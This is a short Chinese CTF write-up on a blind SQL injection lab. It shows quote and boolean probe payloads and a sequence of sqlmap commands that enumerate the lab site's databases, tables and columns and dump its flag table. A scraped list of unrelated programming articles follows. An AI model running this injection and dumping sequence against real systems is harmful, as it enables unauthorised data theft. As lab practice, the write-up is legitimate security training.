简单的sql注入3

news/2024/7/24 8:38:23 标签: php, python, 数据库

 

 

仍然

1

1’

1”

发现1’报错了。。。。。我觉得作者对’情有独钟

再试试

1#

1’#

1”#

发现都可以正常登录

试试1' and '1'='11' and '1'='2发现成功登录和不成功登录的区别在于显示hello不,这里并不会输出id= name=

所以这里应该是个报错型盲注

所以这里就不浪费时间了,直接使用sqlmap

使用

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"

打开开口

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs

查看数据库表名称

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --tables

查询表下的列名称

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T flag

查询列下的flag类型

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -C flag -T flag --dump

查看flag的信息

 

转载于:https://www.cnblogs.com/wosun/p/11215659.html


http://www.niftyadmin.cn/n/680712.html

相关文章

手机端页面自适应解决方案—rem布局

相信很多刚开始写移动端页面的同学都要面对页面自适应的问题,当然解决方案很多,比如:百分比布局,弹性布局flex(什么是flex),也都能获得不错的效果,这里主要介绍的是本人在实践中用的…

(前端)html与css css 16、浮动

浮动 浮动:float 漂流的意思。 作用:让元素以某一方向并排排列。 浮动的特殊效果:元素脱离标准流,既可以设置宽高,又可以一行排列。 属性值:left,right 左浮动:float: left; 从第一个…

超出字数部分省略(主要解决不兼容;display: -webkit-box;的浏览器)多谢

注明:内容于http://www.cnblogs.com/chentongtong/p/5474553.html进一步整理。 1、现webkit内核的浏览器支持display: -webkit-box;属性, 所以网页中显示两行文字,超出部分省略,可以用样式 overflow: hidden;text-overflow: ell…

Atcoder(134)E - Sequence Decomposing

E - Sequence Decomposing Time Limit: 2 sec / Memory Limit: 1024 MB Score : 500500 points Problem Statement You are given a sequence with NN integers: A{A1,A2,⋯,AN}A{A1,A2,⋯,AN}. For each of these NN integers, we will choose a color and paint the integer …

mescroll API 汇总

// 初始化mescroll function initMeScroll() { //创建MeScroll对象,内部已默认开启下拉刷新,自动执行up.callback,刷新列表数据; //是否为ios设备; var isIOS !!navigator.userAgent.match(/(i[^;];( U;)? CPU.Mac OS X/); //ios终端 //是否为PC端,如果是scrollbar端,默…

C#完全学习手册-02--C#注释

1. //注释内容2./*注释内容*/3.XML注释功能(参考:http://www.cnblogs.com/beyoung/archive/2007/07/22/827521.html)使用特殊的注释语法(///)开头。在///之后,你可以使用预先定义的标签注释你的代码,也可以…

时间字符串和时间戳之间的转换

1、当前时间换时间戳 var timestamp parseInt(new Date().getTime()/1000); // 当前时间戳 document.write(timestamp); 2、当前时间换日期字符串 复制代码 var now new Date(); var yy now.getFullYear(); //年 var mm now.getMonth() 1; //月 var dd now.getDate();…

精心收集的48个JavaScript代码片段,仅需30秒就可理解

源文链接 :https://github.com/Chalarangelo/30-seconds-of-code#anagrams-of-string-with-duplicates 该项目来自于 Github 用户 Chalarangelo,目前已在 Github 上获得了 5000 多Star,精心收集了多达 48 个有用的 JavaScript 代码片段&…